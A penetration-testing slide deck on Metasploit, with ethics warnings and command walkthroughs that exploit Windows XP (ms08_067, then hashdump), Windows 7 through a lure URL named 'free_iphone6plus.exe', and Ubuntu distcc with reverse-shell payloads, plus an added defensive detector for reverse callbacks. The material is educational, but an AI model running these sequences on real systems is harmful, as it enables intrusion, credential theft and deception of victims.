Pen-Testing With Metasploit
By - Mohammed Danish Amber
AGENDA
▪ Why & What's Pen-Testing
▪ About Metasploit
▪ Metasploit Basics & Meterpreter
▪ Demo
Mohammed Danish Amber
▪ Geek & Security Analyst
▪ Information Security Enthusiast
▪ Working in TCS
▪ Lecturer & Engineer
▪ Collaborative Project - Hacker Ecosystem
▪ Make Internet a Secure Place
Why Pen-Testing
▪ Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches
▪ Penetration testing is one of the most effective ways to identify weaknesses and deficiencies in these programs
What's Pen-Testing
▪ A method to evaluate the security of a computer system / network
▪ Practice (attacking) an IT system like a ‘hacker’ does
– Find security holes (weaknesses)
– Bypass security mechanisms
– Compromise an organization’s IT system security
MUST HAVE PERMISSION FROM IT SYSTEM OWNER
ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
ETHICS
▪ THINK BEFORE YOU ACT
▪ DON'T BE STUPID
▪ DON'T BE MALICIOUS
PEN-TESTING PHASES
INFORMATION GATHERING
VULNERABILITY ANALYSIS
EXPLOITATION
POST EXPLOITATION
REPORTING
Metasploit
▪ Not Just A Tool but an entire framework
▪ An Open Source platform for writing security tools and exploits
▪ Easily build attack vectors by combining its exploits, payloads and encoders
▪ Create and execute more advanced attacks
▪ Ruby based
Metasploit Interfaces
▪ MSFconsole
▪ msfweb, msfgui (discontinued)
▪ Metasploit Pro & Community Edition
▪ Armitage
MSFconsole
MSFcli
Metasploit Terminology
▪ Exploit: Code that allows a pentester to take advantage of a flaw within a system, application, or service
▪ Payload: Code that we want the target system to execute (a few commands to be run on the target system)
▪ Shellcode: A set of instructions used as the payload when exploitation occurs
▪ Module: A piece of software that can be used by Metasploit
▪ Listener: A component waiting for an incoming connection
How does Exploitation work
▪ Diagram: Attacker sends Exploit + Payload to the Vulnerable Server
▪ On the Vulnerable Server: Exploit runs, then Payload runs
▪ Attacker and Vulnerable Server then upload + download DATA
Meterpreter
▪ Used as a payload after a vulnerability is exploited
▪ Improves post-exploitation
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
Meterpreter shell
Meterpreter Commands
Windows XP Exploitation
▪ msf > search windows/smb
▪ msf > info exploit/windows/smb/ms08_067_netapi
▪ msf > use exploit/windows/smb/ms08_067_netapi
▪ msf exploit(ms08_067_netapi) > show payloads
▪ msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
▪ msf exploit(ms08_067_netapi) > show options
▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip>
▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip>
▪ msf exploit(ms08_067_netapi) > show options
▪ msf exploit(ms08_067_netapi) > exploit
▪ meterpreter > background
▪ msf exploit(ms08_067_netapi) > sessions -l
Windows XP Exploitation
▪ msf exploit(ms08_067_netapi) > sessions -i 1
▪ meterpreter > getsystem -h
▪ meterpreter > getuid
▪ meterpreter > hashdump
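The exploitation flow in the diagram above (exploit + payload in, reverse_tcp payload calling back to LHOST) is what a defender sees on the wire when the SMB walkthrough above succeeds. The following detection example is added here and is not part of the slides; the log format, the addresses and the 30-second callback window are constructed assumptions.

```python
"""Detect the exploit-then-callback pattern the deck describes: an inbound
connection to an exploited service (SMB/445 here, the port ms08_067_netapi
targets) followed shortly by an outbound connection from that host back to
the same peer, i.e. a reverse_tcp payload calling home to LHOST:LPORT."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection log for illustration: "timestamp src sport dst dport".
# 10.0.0.20 is the monitored server; 10.0.0.5 plays the attacker.
SAMPLE_LOG = """\
2015-03-01T10:00:01 10.0.0.5 49152 10.0.0.20 445
2015-03-01T10:00:04 10.0.0.20 1056 10.0.0.5 443
2015-03-01T10:05:00 10.0.0.7 50000 10.0.0.20 445
2015-03-01T10:09:00 10.0.0.20 1057 10.0.0.9 80
"""

EXPLOITED_PORTS = {445}                  # service ports the exploit is delivered to
CALLBACK_WINDOW = timedelta(seconds=30)  # assumed: payload calls back within seconds

def parse_log(text):
    """Parse the constructed log into (timestamp, src, sport, dst, dport) tuples."""
    events = []
    for line in text.splitlines():
        ts, src, sport, dst, dport = line.split()
        events.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return events

def find_reverse_callbacks(events):
    """Return (victim, attacker, callback_port) for each host that was hit on an
    exploited port and then opened a connection back to that same peer in time."""
    inbound = defaultdict(list)  # (victim, attacker) -> timestamps of inbound hits
    alerts = []
    for ts, src, sport, dst, dport in sorted(events):
        if dport in EXPLOITED_PORTS:
            inbound[(dst, src)].append(ts)  # someone touched the exploited service
            continue
        # Outbound from a recently hit host to the very peer that hit it: a likely callback.
        recent = (ts - hit for hit in inbound.get((src, dst), []))
        if any(timedelta(0) <= delta <= CALLBACK_WINDOW for delta in recent):
            alerts.append((src, dst, dport))
    return alerts

if __name__ == "__main__":
    for victim, attacker, port in find_reverse_callbacks(parse_log(SAMPLE_LOG)):
        print(f"possible reverse shell: {victim} -> {attacker}:{port} after inbound exploit attempt")
```

The third and fourth sample lines show why the correlation matters: a bare SMB connection, or an outbound connection to an unrelated host, raises nothing on its own.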
Windows 7 Exploitation
▪ msf > use exploit/windows/browser/ms11_003_ie_css_import
▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
▪ msf exploit(ms11_003_ie_css_import) > show options
▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <attacker ip>
▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe
▪ msf exploit(ms11_003_ie_css_import) > set LHOST <attacker ip>
▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443
▪ msf exploit(ms11_003_ie_css_import) > exploit
Just wait until the victim opens the URL http://<attacker ip>:80/free_iphone6plus.exe
Windows 7 Exploitation
▪ msf exploit(ms11_003_ie_css_import) > sessions -l
▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1
▪ meterpreter > sysinfo
▪ meterpreter > shell
Ubuntu Exploitation
▪ search distcc
▪ use exploit/unix/misc/distcc_exec
▪ show payloads
▪ set PAYLOAD cmd/unix/reverse
▪ show options
▪ set rhost <victim ip>
▪ set lhost <attacker ip>
Any Questions?
Thanks To
▪ Kali / BackTrack Linux
▪ Metasploit Team (HD Moore & rapid7)
▪ Offensive Security / Metasploit Unleashed
▪ David Kennedy
▪ Georgia Weidman
▪ Null Hyderabad Chapter - CORE TEAM
▪ #nullhyd @nullhyd
WWW.MOHAMMEDDANISHAMBER.COM